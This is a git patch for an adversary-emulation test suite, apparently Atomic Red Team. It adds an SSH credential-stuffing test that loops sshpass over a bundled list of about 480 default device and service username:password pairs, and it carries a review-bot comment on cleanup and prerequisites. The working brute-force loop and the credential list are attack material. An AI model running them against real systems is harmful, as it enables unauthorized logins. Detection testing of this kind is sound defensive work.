From 8b308641929003da70f18d9a70f9468a2842af86 Mon Sep 17 00:00:00 2001
From: madhavbhatt
Date: Mon, 7 Jun 2021 15:17:31 -0700
Subject: [PATCH] T1110.004 : SSH Credential Stuffing FROM Linux , MacOS
---
atomics/T1110.004/T1110.004.yaml | 64 +++
atomics/T1110.004/src/credstuffuserpass.txt | 482 ++++++++++++++++++++
2 files changed, 546 insertions(+)
create mode 100644 atomics/T1110.004/T1110.004.yaml
create mode 100644 atomics/T1110.004/src/credstuffuserpass.txt
diff --git a/atomics/T1110.004/T1110.004.yaml b/atomics/T1110.004/T1110.004.yaml
new file mode 100644
index 00000000..29d8c304
--- /dev/null
+++ b/atomics/T1110.004/T1110.004.yaml
@@ -0,0 +1,64 @@
+---
+attack_technique: T1110.004
+display_name: 'Brute Force: Credential Stuffing'
+
+atomic_tests:
+- name: SSH Credential Stuffing From Linux
+ description: |
+ Using username,password combination from a password dump to login over SSH.
+
+ supported_platforms:
+ - linux
+
+ input_arguments:
+ target_host:
+ description: IP Address / Hostname you want to target.
+ type: String
+ default: localhost
+
+ dependency_executor_name: bash
+ dependencies:
+ - description: |
+ Requires SSHPASS
+ prereq_command: |
+ if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
+ get_prereq_command: |
+ if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
+
+ executor:
+ name: bash
+ elevation_required: false
+ command: |
+ cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+ for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+
+- name: SSH Credential Stuffing From MacOS
+ description: |
+ Using username,password combination from a password dump to login over SSH.
+
+ supported_platforms:
+ - macos
+
+ input_arguments:
+ target_host:
+ description: IP Address / Hostname you want to target.
+ type: String
+ default: localhost
+
+ dependency_executor_name: bash
+ dependencies:
+ - description: |
+ Requires SSHPASS
+ prereq_command: |
+ if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
+ get_prereq_command: |
+ /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
+ brew install hudochenkov/sshpass/sshpass
+
+ executor:
+ name: bash
+ elevation_required: false
+ command: |
+ cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+ for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+
diff --git a/atomics/T1110.004/src/credstuffuserpass.txt b/atomics/T1110.004/src/credstuffuserpass.txt
new file mode 100644
index 00000000..ed0295f7
--- /dev/null
+++ b/atomics/T1110.004/src/credstuffuserpass.txt
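Review bot: Neither executor defines a `cleanup_command`, so each run leaves the credential list at the fixed path `/tmp/credstuffuserpass.txt`, and with `StrictHostKeyChecking=no` ssh will also record the target's host key in the operator's `known_hosts`; adding `cleanup_command: rm -f /tmp/credstuffuserpass.txt` to both tests keeps them repeatable. The macOS `get_prereq_command` executes Homebrew's `install.sh` from the `master` branch on every prereq run, even when `brew` is already installed, and then installs from the third-party tap `hudochenkov/sshpass`, so running prereqs means trusting two unpinned remote sources; a `command -v brew` guard and a sentence in the dependency description naming the tap would make that explicit. On Linux the `else` branch of `get_prereq_command` only echoes a message and so exits 0 on distributions other than Ubuntu or Kali; it should end with `exit 1` so the missing dependency is reported. The descriptions could also state what a defender should expect to see, presumably a burst of failed password authentications for many usernames from one source in the target's sshd log.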
@@ -0,0 +1,482 @@ +ADMINISTRATOR:ADMINISTRATOR +ADMN:admn +Administrator:3ware +Administrator:admin +Administrator:changeme +Administrator:ganteng +Administrator:letmein +Administrator:password +Administrator:pilou +Administrator:smcadmin +Any:12345 +CSG:SESAME +Cisco:Cisco +D-Link:D-Link +DTA:TJM +GEN1:gen1 +GEN2:gen2 +GlobalAdmin:GlobalAdmin +HTTP:HTTP +IntraStack:Asante +IntraSwitch:Asante +JDE:JDE +LUCENT01:UI-PSWD-01 +LUCENT02:UI-PSWD-02 +MDaemon:MServer +MICRO:RSX +Manager:Manager +Manager:friend +NAU:NAU +NETWORK:NETWORK +NICONEX:NICONEX +PBX:PBX +PFCUser:240653C9467E45 +PRODDTA:PRODDTA +PSEAdmin:$secure$ +PlcmSpIp:PlcmSpIp +Polycom:SpIp +RMUser1:password +SYSADM:sysadm +Sweex:Mysweex +USERID:PASSW0RD +User:Password +VNC:winterm +VTech:VTech +ZXDSL:ZXDSL +acc:acc +adfexc:adfexc +admin:0 +admin:0000 +admin:1111 +admin:11111111 +admin:123 +admin:1234 +admin:123456 +admin:1234567890 +admin:1234admin +admin:2222 +admin:22222 +admin:3477 +admin:3ascotel +admin:7ujMko0admin +admin:7ujMko0vizxv +admin:9999 +admin:Admin +admin:AitbISP4eCiG +admin:Ascend +admin:BRIDGE +admin:Intel +admin:MiniAP +admin:NetCache +admin:NetICs +admin:OCS +admin:P@55w0rd! 
+admin:PASSWORD +admin:Protector +admin:SMDR +admin:SUPER +admin:Symbol +admin:TANDBERG +admin:_Cisco +admin:access +admin:admin +admin:admin117.35.97.74 +admin:admin123 +admin:admin1234 +admin:administrator +admin:adminttd +admin:adslolitec +admin:adslroot +admin:adtran +admin:articon +admin:asante +admin:ascend +admin:asd +admin:atc123 +admin:atlantis +admin:backdoor +admin:barricade +admin:barricadei +admin:bintec +admin:cableroot +admin:changeme +admin:cisco +admin:comcomcom +admin:conexant +admin:default +admin:diamond +admin:enter +admin:epicrouter +admin:extendnet +admin:fliradmin +admin:giraff +admin:hagpolm1 +admin:hello +admin:help +admin:hp.com +admin:ironport +admin:isee +admin:jvc +admin:kont2004 +admin:letmein +admin:leviton +admin:linga +admin:meinsma +admin:michaelangelo +admin:michelangelo +admin:microbusiness +admin:motorola +admin:mu +admin:my_DEMARC +admin:netadmin +admin:noway +admin:oelinux123 +admin:operator +admin:p-assword +admin:pass +admin:password +admin:passwort +admin:pento +admin:pfsense +admin:private +admin:public +admin:pwp +admin:radius +admin:rmnetlm +admin:root +admin:secure +admin:service +admin:setup +admin:sitecom +admin:smallbusiness +admin:smcadmin +admin:speedxess +admin:superuser +admin:support +admin:switch +admin:synnet +admin:sysAdmin +admin:system +admin:tech +admin:ubnt +admin:visual +admin:w2402 +admin:wbox +admin:xad$l#12 +admin:xad$|#12 +admin:zoomadsl +admin2:changeme +administrator:administrator +administrator:changeme +adminstat:OCS +adminstrator:changeme +adminttd:adminttd +adminuser:OCS +adminview:OCS +alpine:alpine +anonymous:Exabyte +anonymous:any@ +apc:apc +at4400:at4400 +bbsd-client:NULL +bbsd-client:changeme2 +bciim:bciimpw +bcim:bcimpw +bcms:bcmspw +bcnas:bcnaspw +bcnas:pcnaspw +blue:bluepw +browse:browsepw +browse:looker +cablecom:router +cablemodem:robotics +cac_admin:cacadmin +cas:cascade +ccrusr:ccrusr +cellit:cellit +cgadmin:cgadmin +cisco:cisco +citel:citel +client:client +cmaker:cmaker 
+comcast:1234 +corecess:corecess +craft:craft +craft:craftpw +craft:crftpw +cusadmin:highspeed +cust:custpw +customer:none +dadmin:dadmin01 +davox:davox +debug:d.e.b.u.g +debug:synnet +default:antslq +default:default +default:password +deskalt:password +deskman:changeme +desknorm:password +deskres:password +device:device +dhs3mt:dhs3mt +dhs3pms:dhs3pms +diag:danger +diag:switch +disttech:4tas +draytek:1234 +e250:e250changeme +e500:e500changeme +echo:User +echo:echo +eng:engineer +enquiry:enquirypw +field:support +guest:1111 +guest:12345 +guest:123456 +guest:User +guest:guest +guest:xc3511 +halt:tlah +helpdesk:OCS +hsa:hsadb +hscroot:abc123 +iclock:timely +images:images +inads:inads +inads:indspw +init:initpw +install:llatsni +install:secret +installer:installer +intel:intel +intermec:intermec +intermec:intermec1QTPS +kermit:kermit +l2:l2 +l3:l3 +locate:locatepw +login:0 +login:1111 +login:8429 +login:access +login:admin +login:password +lp:lp +m1122:m1122 +maint:maint +maint:maintpw +maint:ntacdmax +maint:rwmaint +manage:!manage +manager:admin +manager:change_on_install +manager:friend +manager:manager +manager:sys +manuf:xxyyzz +mediator:mediator +mg3500:merlin +mlusr:mlusr +monitor:monitor +mother:fucker +mtch:mtch +mtcl:mtcl +naadmin:naadmin +netangr:attack +netman:netman +netopia:netopia +netrangr:attack +netscreen:netscreen +nms:nmspw +nokai:nokai +nokia:nokia +none:0 +none:admin +op:op +op:operator +operator:$chwarzepumpe +operator:1234 +operator:operator +oracle:oracle +patrol:patrol +piranha:piranha +piranha:q +poll:tech +public:public +radware:radware +rapport:r@p8p0r+ +rcust:rcustpw +readonly:lucenttech2 +readwrite:lucenttech1 +recovery:recovery +replicator:replicator +ro:ro +root:000000 +root:1111 +root:1234 +root:12345 +root:123456 +root:1234567890 +root:1234qwer +root:123qwe +root:1q2w3e4r5 +root:3ep5w2u +root:54321 +root:666666 +root:7ujMko0admin +root:7ujMko0vizxv +root:888888 +root:Admin +root:Cisco +root:GMB182 +root:LSiuY7pOmZG2s +root:Mau'dib 
+root:PASSWORD +root:ROOT500 +root:Serv4EMC +root:Zte521 +root:abc123 +root:admin +root:admin1234 +root:admin_1 +root:ahetzip8 +root:alpine +root:anko +root:antslq +root:ascend +root:attack +root:avtech +root:b120root +root:bananapi +root:blender +root:calvin +root:changeme +root:cms500 +root:comcom +root:coolphoenix579 +root:davox +root:default +root:dreambox +root:fivranne +root:ggdaseuaimhrke +root:hi3518 +root:iDirect +root:ikwb +root:ikwd +root:jauntech +root:juantech +root:jvbzd +root:klv123 +root:klv1234 +root:letacla +root:maxided +root:oelinux123 +root:openssh +root:openvpnas +root:orion99 +root:pa55w0rd +root:pass +root:password +root:permit +root:realtek +root:root +root:tini +root:tslinux +root:ubnt +root:user +root:vizxv +root:wyse +root:xc3511 +root:xmhdipc +root:zlxx. +root:zte9x15 +router:router +rw:rw +rwa:rwa +scmadmin:scmchangeme +scout:scout +secret:secret +secure:secure +security:security +service:smile +setup:changeme +setup:changeme! +setup:setup +smc:smcadmin +spcl:0 +storwatch:specialist +stratacom:stratauser +su:super +super:5777364 +super:super +super:surt +super.super:master +superadmin:secret +superman:21241036 +superman:talent +superuser:123456 +superuser:admin +supervisor:PlsChgMe! +supervisor:PlsChgMe1 +supervisor:supervisor +supervisor:zyad1234 +support:123 +support:1234 +support:12345 +support:123456 +support:admin +support:h179350 +support:login +support:support +support:supportpw +support:zlxx. 
+sys:uplink +sysadm:Admin +sysadm:PASS +sysadm:anicust +sysadm:sysadm +sysadmin:PASS +sysadmin:password +sysadmin:sysadmin +system:change_on_install +system:password +system:sys +system/manager:sys/change_on_install +target:password +teacher:password +tech:ANYCOM +tech:ILMI +tech:field +tech:tech +telco:telco +telecom:telecom +tellabs:tellabs#1 +telnet:telnet +temp1:password +test:test +tiara:tiaranet +tiger:tiger123 +topicalt:password +topicnorm:password +topicres:password +ubnt:ubnt +user:123456 +user:pass +user:password +user:public +user:tivonpw +user:user +vcr:NetVCR +volition:volition +vt100:public +webadmin:1234 +webadmin:webadmin +websecadm:changeme +wlse:wlsedb +wradmin:trancell +write:private +xd:xd +xxx:cascade +zyfwp:PrOw!aN_fXp